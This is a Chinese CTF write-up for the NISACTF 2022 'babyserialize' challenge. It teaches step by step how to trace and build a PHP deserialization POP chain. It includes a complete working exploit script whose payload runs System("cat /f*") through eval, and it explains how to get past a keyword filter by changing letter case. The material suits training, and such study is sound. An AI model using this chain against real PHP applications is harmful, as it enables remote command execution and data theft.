[NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)

简介: [NISACTF 2022]babyserialize(pop链构造与脚本编写详细教学)

做这道题作为pop链的构造很典型,也很有意思,因为还存在一些其他东西。

打开链接,这种很多类的PHP代码多半是需要构造pop链

一、理清pop链并进行标注

先找eval、flag这些危险函数和关键字样(这就是链尾),找到eval函数,且参数是txw4ever

我们可以利用这个txw4ever,来调用系统函数实现命令执行


OK,下面开始教你们做标注


首先我们找到第一步用到的参数所在位置,并在后面标注清楚需要传入的内容


1可以理解为第一步,shell表示我们这里需要传入一个类似shell的东西或者用system标注


传给谁就标注在谁的后面,这里表示要传给txw4ever,而txw4ever是在NISA类下

标注好后,我们回到PHP源码,往eval上面看,发现需要触发__invoke()函数

__invoke是对象被当做函数进行调用时就会触发,我们去找类似$a()这种的(所有类里面找)

找到$bb(),它对应的参数是su,且在类Ilovetxw里

同理我们进行标注,表示要调用参数su,传入NISA类

标注好后,我们回到PHP源码,往bb上面看,发现需要触发__toString()函数

__ToString⽅法是当对象被当做字符串的时候会自动调用

继续在所有类里面找,找到strtolower函数,该函数是将字符串转换成小写

对应参数 a ,在four类里,我们找到a的位置继续进行标注

因为这里还存在一个if的判断语句,需要符合才能执行后面语句,所有还需要给fun也赋值

因为fun是私有变量,我们最好直接在类里面修改

原来$fun='abc'; 将它修改为下图所示


回到PHP源码,继续往上我们找到__set函数

__set是对不存在或者不可访问的变量进行赋值就会自动调用

于是我们找到huang,我们可以看到在Ilovetxw类里面并不存在fun这个参数

同样进行标注

后面我就不详细理下去了,相信你们已经明白了

(不懂的欢迎私信我,可以给你们一对一慢慢详细讲解)

依次往上追到__call函数,__call是对不存在的方法或者不可访问的方法进行调用就自动调用

找到nisa,该类中并不存在这个方法,再往上就找到wakeup函数, 即我们的链头了

该函数在使用unserilize之前就会触发。

以及相关的标注:

我都感觉我讲得太详细了,听懂了的评论区扣个666

至此,我们理清了pop链,并进行了传参的相关标注

二、如何编写相关脚本

先将所有类复制下来放进VS(前面加上<?php)

在这些类后面,我们开始写脚本,我先将完整的能跑出flag的脚本给大家:

<?php
class NISA{
    public $fun="show_me_flag";
    public $txw4ever; // 1 shell
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }
    function __call($from,$val){
        $this->fun=$val[0];
    }
    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}
class TianXiWei{
    public $ext; //5 Ilovetxw
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}
class Ilovetxw{
    public $huang; //4 four
    public $su; //2 NISA
    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }
    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}
class four{
    public $a="TXW4EVER"; //3 Ilovetxw
    private $fun='sixsixsix'; //fun = "sixsixsix
    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}
$n = new NISA();
$n->txw4ever = 'System("cat /f*");';
$n->fun = "666";
$i = new Ilovetxw();
$i->su = $n;
$f = new four();
$f->a = $i;
$i = new Ilovetxw();
$i->huang = $f;
$t = new TianXiWei();
$t->ext = $i;
echo urlencode(serialize($t));

我们就根据刚才标注的12345顺序来写,用到哪个类时,必须先用new实例化一遍


(哪怕重复用到了某个类,也需要重新实例化一遍,比如上面的Ilovetxw类)


给大家开个头吧,我们先用到NISA类,所以实例化NISA类:$n = new NISA();


$n->txw4ever表示调用这个类里面的txw4ever,后面传入我们想要传入的内容即可


至于为什么改fun的值,我们后面再说;


至此我们完成了1步骤,继续往下看,来到2


我们用到Ilovetxw类,将其实例化,同理根据标注进行调用传参即可


这样我们就可以写出后面所以的脚本了

三、过滤与绕过

这里存在两个需要绕过的地方,源码有给提示

1、waf的绕过

这里有一个hint函数,触发就会输出一些提示的东西

找到hint函数位置,在第一个类,如何绕过这个函数 ,只需让if语句判断不成立即可

所以你现在知道为什么前面我们需要修改fun的值了吧。

如果没有改fun的值,你只能得到一个提示,flag在根目录

 

2、preg_match的绕过

preg_match用来进行正则匹配,但没给匹配的内容,用的......,暗示我们存在关键字的过滤,

这里system被过滤掉了,如果我们原封不动的使用system,不出意外会返回 something wrong

OK,就不跟大家唠叨了,咱直接拿flag

NSSCTF{eaa7fba4-17d4-4f17-ad15-38f20c0bf961}

目录
相关文章
ES6新增循环对象的四种方法(通俗易懂)
ES6新增循环对象的四种方法(通俗易懂)
|
前端开发
前端学习案例1-call,apply的重用
前端学习案例1-call,apply的重用
74 0
前端学习案例1-call,apply的重用
|
数据安全/隐私保护 Python
python接口自动化(三十四)-封装与调用--函数和参数化(详解)
参数化的思维只需记住一点:不要写死,这样就便于维护,否则就会牵一发而动全身,一处修改导致处处修改,不便于维护。
1198 1
python接口自动化(三十四)-封装与调用--函数和参数化(详解)
|
JSON jenkins 持续交付
python接口自动化(十六)--参数关联接口后传(详解)
大家对前边的自动化新建任务之后,接着对这个新建任务操作了解之后,希望带小伙伴进一步巩固胜利的果实,夯实基础。因此再在沙场实例演练一下博客园的相关接口。我们用自动化发随笔之后,要想接着对这篇随笔操作,不用说就需 要用参数关联了,发随笔之后会有一个随笔的 id,获取到这个 id,继续操作传这个随笔 id 就可以了(博客园的登录机制已经变了,不能用账号和密码登录了,这里用 cookie 登录)
200 1
python接口自动化(十六)--参数关联接口后传(详解)
|
jenkins 测试技术 持续交付
python接口自动化(三十六)-封装与调用--流程类接口关联续集(详解)
上一篇已经给大家都介绍过了流程类接口关联,但是由于博客的登录机制改变,所以没有办法给小伙伴们实战演练一下,那么这篇就按照上一篇计划的用jenkins来给小伙伴们演示一下流程类接口的封装和调用,其实很简单,就是用上一篇和前边这篇传送门的代码稍稍修改即可。不知道你自己练习了么,如果练习了,可以看看和我有什么不同,没练习的看看自己思路和我有啥不一样。好了废话少说进入主题
199 0
python接口自动化(三十六)-封装与调用--流程类接口关联续集(详解)
|
jenkins 测试技术 持续交付
python接口自动化(三十五)-封装与调用--流程类接口关联(详解)
流程相关的接口,主要用 session 关联,如果写成函数(如上篇),s 参数每个函数都要带,每个函数多个参数,这时候封装成类会更方便。在这里我们还是以博客园为例,带着小伙伴们实践一下。
384 0
python接口自动化(三十五)-封装与调用--流程类接口关联(详解)
|
数据管理 测试技术 API
python接口自动化(三十七)-封装与调用--读取excel 数据(详解)
在进行软件接口测试或设计自动化测试框架时,一个不比可避免的过程就是: 参数化,在利用python进行自动化测试开发时,通常会使用excel来做数据管理,利用xlrd、xlwt开源包来读写excel。例如:当我们登录的账号有多个的时候,我们一般用 excel 存放测试数据,本篇文章介绍,python 读取excel 方法,并保存为字典格式。
370 0
python接口自动化(三十七)-封装与调用--读取excel 数据(详解)
|
测试技术 Python
python接口自动化(二十六)--批量执行用例 discover(详解)
我们在写用例的时候,单个脚本的用例好执行,那么多个脚本的时候,如何批量执行呢?这时候就需要用到 unittest 里面的 discover 方法来加载用例了。加载用例后,用 unittest 里面的 TextTestRunner 这里类的 run 方法去一次执行多个脚 本的用例。那么前边介绍那么多都是半道开始,半道出家,这篇就带大家从头到尾,一步一步给小伙伴们详细介绍一下。
258 0
python接口自动化(二十六)--批量执行用例 discover(详解)
|
JavaScript 前端开发
🍉ES6基础-用模块封装代码
🍉ES6基础-用模块封装代码
203 0